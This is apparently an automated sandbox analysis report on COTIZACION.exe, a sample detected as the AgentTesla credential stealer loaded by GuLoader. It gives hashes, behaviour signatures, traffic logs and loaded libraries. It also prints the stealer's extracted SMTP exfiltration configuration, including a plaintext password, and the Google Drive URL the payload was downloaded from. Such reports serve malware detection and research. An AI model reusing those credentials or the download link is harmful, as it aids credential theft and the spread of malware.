Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
COTIZACION.exe

Overview

General Information

Sample name:COTIZACION.exe
Analysis ID:1549213
MD5:ad3b285c00819c0aa52bb492ce560bc1
SHA1:93dcb8eb3ac7fa43dc97cc36f203622adc195a8e
SHA256:26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • COTIZACION.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\COTIZACION.exe" MD5: AD3B285C00819C0AA52BB492CE560BC1)
    • COTIZACION.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\COTIZACION.exe" MD5: AD3B285C00819C0AA52BB492CE560BC1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2000502828.0000000006398000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries
            Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 67.23.226.139, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\COTIZACION.exe, Initiated: true, ProcessId: 7796, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 64766
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T12:37:29.294568+010020229301A Network Trojan was detected4.245.163.56443192.168.2.949797TCP
            2024-11-05T12:38:10.074857+010020229301A Network Trojan was detected20.12.23.50443192.168.2.964762TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T12:38:31.323411+010028032702Potentially Bad Traffic192.168.2.964763142.250.185.238443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: COTIZACION.exe.7316.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
            Source: COTIZACION.exeReversingLabs: Detection: 63%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: COTIZACION.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.9:64763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:64764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:64765 version: TLS 1.2
            Source: COTIZACION.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: global trafficTCP traffic: 192.168.2.9:64766 -> 67.23.226.139:587
            Source: Joe Sandbox ViewIP Address: 67.23.226.139 67.23.226.139
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:64762
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:64763 -> 142.250.185.238:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.9:49797
            Source: global trafficTCP traffic: 192.168.2.9:64766 -> 67.23.226.139:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: mail.showpiece.trillennium.biz
            Source: COTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.showpiece.trillennium.biz
            Source: COTIZACION.exe, 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000000.00000000.1325260192.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000000.1996163336.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error...
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: COTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://showpiece.trillennium.biz
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: COTIZACION.exe, 00000005.00000002.2578974531.0000000009690000.00000004.00001000.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqIM8
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/v
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/H
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download
            Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 64763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64764
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.9:64763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:64764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:64765 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\COTIZACION.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\COTIZACION.exeJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_700223510_2_70022351
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_0015A9505_2_0015A950
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_0015D9905_2_0015D990
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_00154A985_2_00154A98
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_00153E805_2_00153E80
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_001541C85_2_001541C8
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B23C2205_2_3B23C220
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B2356485_2_3B235648
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B2366985_2_3B236698
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B23B2C05_2_3B23B2C0
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B2331085_2_3B233108
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B2323385_2_3B232338
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B2377405_2_3B237740
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B235D835_2_3B235D83
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B2300405_2_3B230040
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B23E4405_2_3B23E440
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B71197B5_2_3B71197B
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B7119885_2_3B711988
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B874B485_2_3B874B48
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B8704485_2_3B870448
            Source: COTIZACION.exeStatic PE information: invalid certificate
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs COTIZACION.exe
            Source: COTIZACION.exe, 00000005.00000002.2598555666.0000000038089000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs COTIZACION.exe
            Source: COTIZACION.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@4/4
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\COTIZACION.exeFile created: C:\Users\user\overlaysJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeMutant created: NULL
            Source: C:\Users\user\Desktop\COTIZACION.exeFile created: C:\Users\user\AppData\Local\Temp\nsyA426.tmpJump to behavior
            Source: COTIZACION.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\COTIZACION.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\COTIZACION.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\COTIZACION.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: COTIZACION.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\COTIZACION.exeFile read: C:\Users\user\Desktop\COTIZACION.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: vaultcli.dllJump to behavior
